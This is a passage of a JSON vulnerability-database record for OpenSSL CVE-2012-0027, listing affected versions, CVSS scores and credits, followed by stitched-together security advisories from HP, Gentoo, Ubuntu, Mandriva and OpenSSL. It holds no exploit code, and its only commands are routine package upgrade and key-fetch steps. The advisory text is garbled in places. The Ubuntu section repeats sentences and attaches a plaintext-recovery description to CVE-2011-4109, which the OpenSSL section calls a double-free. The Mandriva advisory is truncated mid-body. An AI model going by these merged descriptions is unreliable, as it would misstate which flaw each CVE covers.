"cpe:2.3:a:openssl:openssl:1.0.0:beta2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8o:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6h:bogus:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.5a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8q:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.2b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.1c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2012-0027" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Nadhem Alfardan and Kenny Paterson, Information Security Group at Royal Holloway, University of London, Ben Laurie, Adam Langley, Andrew Chi, BBN Technologies and Andrey Kulikov", "sources": [ { "db": "BID", "id": "51281" } ], "trust": 0.3 }, "cve": "CVE-2012-0027", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "Partial", "baseScore": 5.0, "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2012-0027", "impactScore": null, "integrityImpact": "None", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2012-0027", "trust": 1.8, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201201-062", "trust": 0.6, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2012-0027", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2012-0027" }, { "db": "JVNDB", "id": "JVNDB-2012-001022" }, { "db": "NVD", "id": "CVE-2012-0027" }, { "db": "CNNVD", "id": "CNNVD-201201-062" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The GOST ENGINE in OpenSSL before 1.0.0f does not properly handle invalid parameters for the GOST block cipher, which allows remote attackers to cause a denial of service (daemon crash) via crafted data from a TLS client. Fiery Network Controllers for Xerox DocuColor 242/252/260 Printer/Copier use a vulnerable version of OpenSSL (0.9.8o). OpenSSL prone to multiple security vulnerabilities. \nAn attacker may leverage these issues to obtain sensitive information, cause a denial-of-service condition and perform unauthorized actions. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nNote: the current version of the following document is available here:\nhttps://h20566.www2.hp.com/portal/site/hpsc/public/kb/\ndocDisplay?docId=emr_na-c03360041\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c03360041\nVersion: 1\n\nHPSBMU02786 SSRT100877 rev.1 - HP System Management Homepage (SMH) Running on\nLinux and Windows, Remote Unauthorized Access, Disclosure of Information,\nData Modification, Denial of Service (DoS), Execution of Arbitrary Code\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2012-06-26\nLast Updated: 2012-06-26\n\nPotential Security Impact: Remote unauthorized access, disclosure of\ninformation, data modification, Denial of Service (DoS), execution of\narbitrary code\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities have been identified with HP System\nManagement Homepage (SMH) running on Linux and Windows. The vulnerabilities\ncould be exploited remotely resulting in unauthorized access, disclosure of\ninformation, data modification, Denial of Service (DoS), and execution of\narbitrary code. \n\nReferences: CVE-2011-1944, CVE-2011-2821, CVE-2011-2834, CVE-2011-3379,\nCVE-2011-3607, CVE-2011-4078, CVE-2011-4108, CVE-2011-4153, CVE-2011-4317,\nCVE-2011-4415, CVE-2011-4576, CVE-2011-4577, CVE-2011-4619, CVE-2011-4885,\nCVE-2012-0021, CVE-2012-0027, CVE-2012-0031, CVE-2012-0036, CVE-2012-0053,\nCVE-2012-0057, CVE-2012-0830, CVE-2012-1165, CVE-2012-1823,\nCVE-2012-2012 (AUTOCOMPLETE enabled), CVE-2012-2013 (DoS),\nCVE-2012-2014 (Improper input validation), CVE-2012-2015 (Privilege\nElevation),\nCVE-2012-2016 (Information disclosure),\nSSRT100336, SSRT100753, SSRT100669, SSRT100676,\nSSRT100695, SSRT100714, SSRT100760, SSRT100786,\nSSRT100787, SSRT100815, SSRT100840, SSRT100843, SSRT100869\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHP System Management Homepage (SMH) before v7.1.1 running on Linux and\nWindows. \n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2012-2012 (AV:N/AC:L/Au:N/C:C/I:C/A:P) 9.7\nCVE-2012-2013 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\nCVE-2012-2014 (AV:N/AC:M/Au:S/C:N/I:N/A:N) 6.8\nCVE-2012-2015 (AV:N/AC:M/Au:S/C:P/I:N/A:N) 6.5\nCVE-2012-2016 (AV:L/AC:M/Au:S/C:C/I:N/A:N) 4.4\nCVE-2011-1944 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\nCVE-2011-2821 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2011-2834 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\nCVE-2011-3379 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2011-3607 (AV:L/AC:M/Au:N/C:P/I:P/A:P) 4.4\nCVE-2011-4078 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2011-4108 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3\nCVE-2011-4153 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2011-4317 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3\nCVE-2011-4415 (AV:L/AC:H/Au:N/C:N/I:N/A:P) 1.2\nCVE-2011-4576 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2011-4577 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\nCVE-2011-4619 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2011-4885 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2012-0021 (AV:N/AC:H/Au:N/C:N/I:N/A:P) 2.6\nCVE-2012-0027 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2012-0031 (AV:L/AC:L/Au:N/C:P/I:P/A:P) 4.6\nCVE-2012-0036 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2012-0053 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3\nCVE-2012-0057 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4\nCVE-2012-0830 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2012-1165 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2012-1823 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has provided HP System Management Homepage v7.1.1 or subsequent to resolve\nthe vulnerabilities. HP System Management Homepage v7.1.1 is available here:\n\nHP System Management Homepage for Windows x64\n\n[Download here] or enter the following URL into the browser address window. \n\nhttp://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/psi/swdDetail\ns/?sp4ts.oid=4091409\u0026spf_p.tpst=psiSwdMain\u0026spf_p.prp_psiSwdMain=wsrp-navigati\nonalState%3Dlang%253Den%257Ccc%253DUS%257CprodSeriesId%253D4091408%257CprodNa\nmeId%253D4091409%257CswEnvOID%253D4064%257CswLang%253D8%257CswItem%253DMTX-ab\n0d4e9bb4654a8da503eccfd9%257Cmode%253D3%257Caction%253DdriverDocument\u0026javax.p\nortlet.begCacheTok=com.vignette.cachetoken\u0026javax.portlet.endCacheTok=com.vign\nette.cachetoken\n\nHP System Management Homepage for Windows x86\n\n[Download here] or enter the following URL into the browser address window. \n\nhttp://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/psi/swdDetail\ns/?sp4ts.oid=4091409\u0026spf_p.tpst=psiSwdMain\u0026spf_p.prp_psiSwdMain=wsrp-navigati\nonalState%3Dlang%253Den%257Ccc%253DUS%257CprodSeriesId%253D4091408%257CprodNa\nmeId%253D4091409%257CswEnvOID%253D4022%257CswLang%253D8%257CswItem%253DMTX-f7\nc0d15d28474255bd0ec23136%257Cmode%253D3%257Caction%253DdriverDocument\u0026javax.p\nortlet.begCacheTok=com.vignette.cachetoken\u0026javax.portlet.endCacheTok=com.vign\nette.cachetoken\n\nHP System Management Homepage for Linux (AMD64/EM64T)\n\n[Download here] or enter the following URL into the browser address window. \n\nhttp://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/psi/swdDetail\ns/?sp4ts.oid=4091409\u0026spf_p.tpst=psiSwdMain\u0026spf_p.prp_psiSwdMain=wsrp-navigati\nonalState%3Dlang%253Den%257Ccc%253DUS%257CprodSeriesId%253D4091408%257CprodNa\nmeId%253D4091409%257CswEnvOID%253D4035%257CswLang%253D8%257CswItem%253DMTX-18\nd373dd1361400fbaca892942%257Cmode%253D3%257Caction%253DdriverDocument\u0026javax.p\nortlet.begCacheTok=com.vignette.cachetoken\u0026javax.portlet.endCacheTok=com.vign\nette.cachetoken\n\nHP System Management Homepage for Linux (x86)\n\n[Download here] or enter the following URL into the browser address window. \n\nhttp://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/psi/swdDetail\ns/?sp4ts.oid=4091409\u0026spf_p.tpst=psiSwdMain\u0026spf_p.prp_psiSwdMain=wsrp-navigati\nonalState%3Dlang%253Den%257Ccc%253DUS%257CprodSeriesId%253D4091408%257CprodNa\nmeId%253D4091409%257CswEnvOID%253D4006%257CswLang%253D8%257CswItem%253DMTX-9e\n8a0188f97d48139dcb466509%257Cmode%253D3%257Caction%253DdriverDocument\u0026javax.p\nortlet.begCacheTok=com.vignette.cachetoken\u0026javax.portlet.endCacheTok=com.vign\nette.cachetoken\n\nHISTORY\nVersion:1 (rev.1) 26 June 2012 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin List: A list of HP Security Bulletins, updated\nperiodically, is contained in HP Security Notice HPSN-2011-001:\nhttps://h20566.www2.hp.com/portal/site/hpsc/public/kb/\ndocDisplay?docId=emr_na-c02964430\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttp://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2012 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits;damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners. \n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.10 (GNU/Linux)\n\niEYEARECAAYFAk/p5ksACgkQ4B86/C0qfVkQpwCfbOEZmoo7myCkxQAdqQHevKG5\n6IwAoPw4DI3YBCclyWuRekae7EFscAy0\n=zd3u\n-----END PGP SIGNATURE-----\n. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201203-12\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n http://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: OpenSSL: Multiple vulnerabilities\n Date: March 06, 2012\n Bugs: #397695, #399365\n ID: 201203-12\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in OpenSSL, allowing remote\nattackers to cause a Denial of Service or obtain sensitive information. \n\nBackground\n==========\n\nOpenSSL is an Open Source toolkit implementing the Secure Sockets Layer\n(SSL v2/v3) and Transport Layer Security (TLS v1) as well as a general\npurpose cryptography library. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 dev-libs/openssl \u003c 1.0.0g *\u003e= 0.9.8t\n \u003e= 1.0.0g\n\nDescription\n===========\n\nMultiple vulnerabilities have been found in OpenSSL:\n\n* Timing differences for decryption are exposed by CBC mode encryption\n in OpenSSL\u0027s implementation of DTLS (CVE-2011-4108). \n* An incorrect fix for CVE-2011-4108 creates an unspecified\n vulnerability for DTLS applications using OpenSSL (CVE-2012-0050). \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll OpenSSL users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=dev-libs/openssl-1.0.0g\"\n\nReferences\n==========\n\n[ 1 ] CVE-2011-4108\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4108\n[ 2 ] CVE-2011-4109\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4109\n[ 3 ] CVE-2011-4576\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4576\n[ 4 ] CVE-2011-4577\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4577\n[ 5 ] CVE-2011-4619\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4619\n[ 6 ] CVE-2012-0027\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0027\n[ 7 ] CVE-2012-0050\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0050\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n http://security.gentoo.org/glsa/glsa-201203-12.xml\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2012 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n. Content-Disposition: inline\n\n==========================================================================Ubuntu Security Notice USN-1357-1\nFebruary 09, 2012\n\nopenssl vulnerabilities\n==========================================================================\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 11.10\n- Ubuntu 11.04\n- Ubuntu 10.10\n- Ubuntu 10.04 LTS\n- Ubuntu 8.04 LTS\n\nSummary:\n\nMultiple vulnerabilities exist in OpenSSL that could expose\nsensitive information or cause applications to crash. \n\nSoftware Description:\n- openssl: Secure Socket Layer (SSL) binary and related cryptographic tools\n\nDetails:\n\nIt was discovered that the elliptic curve cryptography (ECC) subsystem\nin OpenSSL, when using the Elliptic Curve Digital Signature Algorithm\n(ECDSA) for the ECDHE_ECDSA cipher suite, did not properly implement\ncurves over binary fields. This could allow an attacker to determine\nprivate keys via a timing attack. This issue only affected Ubuntu 8.04\nLTS, Ubuntu 10.04 LTS, Ubuntu 10.10 and Ubuntu 11.04. (CVE-2011-1945)\n\nAdam Langley discovered that the ephemeral Elliptic Curve\nDiffie-Hellman (ECDH) functionality in OpenSSL did not ensure thread\nsafety while processing handshake messages from clients. This\ncould allow a remote attacker to cause a denial of service via\nout-of-order messages that violate the TLS protocol. This issue only\naffected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS, Ubuntu 10.10 and Ubuntu\n11.04. (CVE-2011-3210)\n\nNadhem Alfardan and Kenny Paterson discovered that the Datagram\nTransport Layer Security (DTLS) implementation in OpenSSL performed a\nMAC check only if certain padding is valid. This could allow a remote\nattacker to recover plaintext. This could allow a remote\nattacker to cause a denial of service. This\ncould allow a remote attacker to cause a denial of service. This\nissue only affected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS, Ubuntu 10.10\nand Ubuntu 11.04. (CVE-2011-4109)\n\nIt was discovered that OpenSSL, in certain circumstances involving\nECDH or ECDHE cipher suites, used an incorrect modular reduction\nalgorithm in its implementation of the P-256 and P-384 NIST elliptic\ncurves. This could allow a remote attacker to obtain the private\nkey of a TLS server via multiple handshake attempts. This issue only\naffected Ubuntu 8.04 LTS. (CVE-2011-4576)\n\nAndrew Chi discovered that OpenSSL, when RFC 3779 support is enabled,\ncould trigger an assert when handling an X.509 certificate containing\ncertificate-extension data associated with IP address blocks or\nAutonomous System (AS) identifiers. This could allow a remote attacker\nto cause a denial of service. This could allow a remote attacker to cause a denial of\nservice. This issue only affected Ubuntu 11.10. (CVE-2012-0027)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 11.10:\n libssl1.0.0 1.0.0e-2ubuntu4.2\n openssl 1.0.0e-2ubuntu4.2\n\nUbuntu 11.04:\n libssl0.9.8 0.9.8o-5ubuntu1.2\n openssl 0.9.8o-5ubuntu1.2\n\nUbuntu 10.10:\n libssl0.9.8 0.9.8o-1ubuntu4.6\n openssl 0.9.8o-1ubuntu4.6\n\nUbuntu 10.04 LTS:\n libssl0.9.8 0.9.8k-7ubuntu8.8\n openssl 0.9.8k-7ubuntu8.8\n\nUbuntu 8.04 LTS:\n libssl0.9.8 0.9.8g-4ubuntu3.15\n openssl 0.9.8g-4ubuntu3.15\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nReferences:\n http://www.ubuntu.com/usn/usn-1357-1\n CVE-2011-1945, CVE-2011-3210, CVE-2011-4108, CVE-2011-4109,\n CVE-2011-4354, CVE-2011-4576, CVE-2011-4577, CVE-2011-4619,\n CVE-2012-0027, CVE-2012-0050\n\nPackage Information:\n https://launchpad.net/ubuntu/+source/openssl/1.0.0e-2ubuntu4.2\n https://launchpad.net/ubuntu/+source/openssl/0.9.8o-5ubuntu1.2\n https://launchpad.net/ubuntu/+source/openssl/0.9.8o-1ubuntu4.6\n https://launchpad.net/ubuntu/+source/openssl/0.9.8k-7ubuntu8.8\n https://launchpad.net/ubuntu/+source/openssl/0.9.8g-4ubuntu3.15\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n _______________________________________________________________________\n\n Mandriva Linux Security Advisory MDVSA-2012:007\n http://www.mandriva.com/security/\n _______________________________________________________________________\n\n Package : openssl\n Date : January 16, 2012\n Affected: 2011. \n \n The updated packages have been patched to correct these issues. \n _______________________________________________________________________\n\n References:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4108\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4109\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4576\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4619\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0027\n http://www.openssl.org/news/secadv_20120104.txt\n _______________________________________________________________________\n\n Updated Packages:\n\n Mandriva Linux 2011:\n 2291c13c44539a5e25f58750a5d6bf8f 2011/i586/libopenssl1.0.0-1.0.0d-2.2-mdv2011.0.i586.rpm\n c610330d2c4c7397feb126247b1fa94f 2011/i586/libopenssl-devel-1.0.0d-2.2-mdv2011.0.i586.rpm\n 36c86a84320e1c8a17a74e4e68bc7d5a 2011/i586/libopenssl-engines1.0.0-1.0.0d-2.2-mdv2011.0.i586.rpm\n 4b8054f2c169d2b3223195053bd15802 2011/i586/libopenssl-static-devel-1.0.0d-2.2-mdv2011.0.i586.rpm\n 3c48b209b941a83a6acfef439c3f78b7 2011/i586/openssl-1.0.0d-2.2-mdv2011.0.i586.rpm \n 7af9d175d066db069aeb82248df9772b 2011/SRPMS/openssl-1.0.0d-2.2.src.rpm\n\n Mandriva Linux 2011/X86_64:\n 21a50bd2be83839266f033c9a0f0fabc 2011/x86_64/lib64openssl1.0.0-1.0.0d-2.2-mdv2011.0.x86_64.rpm\n 7e80ee8e2d445c5f1985cd52d2316658 2011/x86_64/lib64openssl-devel-1.0.0d-2.2-mdv2011.0.x86_64.rpm\n e1f4faa3162a6bbc14b37e4cb8d1e8e2 2011/x86_64/lib64openssl-engines1.0.0-1.0.0d-2.2-mdv2011.0.x86_64.rpm\n 6e3ac6d57cf0f4e13ed8e275a9bd2ff8 2011/x86_64/lib64openssl-static-devel-1.0.0d-2.2-mdv2011.0.x86_64.rpm\n e9e0306f8dc9f398915a646547e262e2 2011/x86_64/openssl-1.0.0d-2.2-mdv2011.0.x86_64.rpm \n 7af9d175d066db069aeb82248df9772b 2011/SRPMS/openssl-1.0.0d-2.2.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\n of md5 checksums and GPG signatures is performed automatically for you. \n\n All packages are signed by Mandriva for security. You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n http://www.mandriva.com/security/advisories\n\n If you want to report vulnerabilities, please contact\n\n security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID Date User ID\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\n \u003csecurity*mandriva.com\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.11 (GNU/Linux)\n\niD8DBQFPFFiBmqjQ0CJFipgRAkIUAJ9foScZELNgGkHUEaaSx9sgdWNMFwCgnsst\neph27yO3eEECVX28+SNUKyw=\n=wTFq\n-----END PGP SIGNATURE-----\n. \n\nDTLS Plaintext Recovery Attack (CVE-2011-4108)\n==============================================\n\nNadhem Alfardan and Kenny Paterson have discovered an extension of the \nVaudenay padding oracle attack on CBC mode encryption which enables an \nefficient plaintext recovery attack against the OpenSSL implementation\nof DTLS. Their attack exploits timing differences arising during\ndecryption processing. A research paper describing this attack can be\nfound at http://www.isg.rhul.ac.uk/~kp/dtls.pdf\n\nThanks go to Nadhem Alfardan and Kenny Paterson of the Information\nSecurity Group at Royal Holloway, University of London\n(www.isg.rhul.ac.uk) for discovering this flaw and to Robin Seggelmann\n\u003cseggelmann@fh-muenster.de\u003e and Michael Tuexen \u003ctuexen@fh-muenster.de\u003e\nfor preparing the fix. \n\nAffected users should upgrade to OpenSSL 1.0.0f or 0.9.8s. \n\nDouble-free in Policy Checks (CVE-2011-4109)\n============================================\n\nIf X509_V_FLAG_POLICY_CHECK is set in OpenSSL 0.9.8, then a policy\ncheck failure can lead to a double-free. The bug does not occur \nunless this flag is set. Users of OpenSSL 1.0.0 are not affected. \n\nThis flaw was discovered by Ben Laurie and a fix provided by Emilia\nKasper \u003cekasper@google.com\u003e of Google. \n\nAffected users should upgrade to OpenSSL 0.9.8s. \n\nUninitialized SSL 3.0 Padding (CVE-2011-4576)\n=============================================\n\nOpenSSL prior to 1.0.0f and 0.9.8s failed to clear the bytes used as\nblock cipher padding in SSL 3.0 records. This affects both clients and\nservers that accept SSL 3.0 handshakes: those that call SSL_CTX_new with\nSSLv3_{server|client}_method or SSLv23_{server|client}_method. It does\nnot affect TLS. \n\nAs a result, in each record, up to 15 bytes of uninitialized memory\nmay be sent, encrypted, to the SSL peer. This could include sensitive\ncontents of previously freed memory. \n\nHowever, in practice, most deployments do not use\nSSL_MODE_RELEASE_BUFFERS and therefore have a single write buffer per\nconnection. That write buffer is partially filled with non-sensitive,\nhandshake data at the beginning of the connection and, thereafter,\nonly records which are longer any any previously sent record leak any\nnon-encrypted data. This, combined with the small number of bytes\nleaked per record, serves to limit to severity of this issue. \n\nThanks to Adam Langley \u003cagl@chromium.org\u003e for identifying and fixing\nthis issue. \n\nAffected users should upgrade to OpenSSL 1.0.0f or 0.9.8s. \n\nMalformed RFC 3779 Data 